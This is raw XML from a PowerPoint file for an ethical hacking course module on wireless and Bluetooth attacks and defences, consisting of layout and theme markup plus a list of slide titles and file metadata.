          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{920CFF80-8C09-479F-8B82-420171A1CA3C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662" r="30662"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7947025" y="0"/>
            <a:ext cx="4244975" cy="6553458"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10667560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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" advClick="0"/>
    </mc:Fallback>
  </mc:AlternateContent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RESOURCE_PATHS_HASH" val="7ecca02c1b4551fa88ea8daf1954be355e733"/>
</p:tagLst>
</file>

<file path=ppt/theme/_rels/theme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gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="5000">
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
                <a:alpha val="0"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="95000">
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
                <a:alpha val="0"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="0" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </a:spPr>
      <a:bodyPr anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr dirty="0">
            <a:solidFill>
              <a:prstClr val="white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 bwMode="auto">
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect b="-970"/>
          </a:stretch>
        </a:blipFill>
        <a:ln w="19050" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="EAEAEA"/>
          </a:solidFill>
          <a:miter lim="800000"/>
          <a:headEnd/>
          <a:tailEnd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53882" dir="2700000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="B2B2B2">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a14:hiddenEffects>
          </a:ext>
        </a:extLst>
      </a:spPr>
      <a:bodyPr wrap="none" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr eaLnBrk="1" hangingPunct="1">
          <a:spcBef>
            <a:spcPct val="40000"/>
          </a:spcBef>
          <a:buClr>
            <a:schemeClr val="accent1"/>
          </a:buClr>
          <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
          <a:buChar char="§"/>
          <a:defRPr smtClean="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Default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67407</TotalTime>
  <Words>4811</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>792</Paragraphs>
  <Slides>48</Slides>
  <Notes>23</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Fonts Used</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>12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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="62" baseType="lpstr">
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Default Theme</vt:lpstr>
      <vt:lpstr>Ethical Hacking Essentials (EHE)  Master of Science in Cybersecurity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Wireless Standards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Client Mis-association</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Unauthorized Association</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Honeypot AP Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Key Reinstallation Attack (KRACK)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cracking WEP Using Aircrack-ng</vt:lpstr>
      <vt:lpstr>Cracking WEP Using Aircrack-ng (Cont’d)</vt:lpstr>
      <vt:lpstr>Cracking WPA-PSK Using Aircrack-ng</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wireless Attack Tools (Cont’d)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bluetooth Stack</vt:lpstr>
      <vt:lpstr>Bluetooth Modes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bluetooth Threats</vt:lpstr>
      <vt:lpstr>Bluetooth Threats (Cont’d)</vt:lpstr>
      <vt:lpstr>Bluetooth Attack Tools</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wireless Security Tools</vt:lpstr>
      <vt:lpstr>Module Summary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010101</dc:creator>
  <cp:lastModifiedBy>Kamal Ibrahim Alieyan</cp:lastModifiedBy>
  <cp:revision>6464</cp:revision>
  <cp:lastPrinted>2021-07-22T13:13:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-29T18:31:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-24T22:30:13Z</dcterms:modified>
</cp:coreProperties>
</file>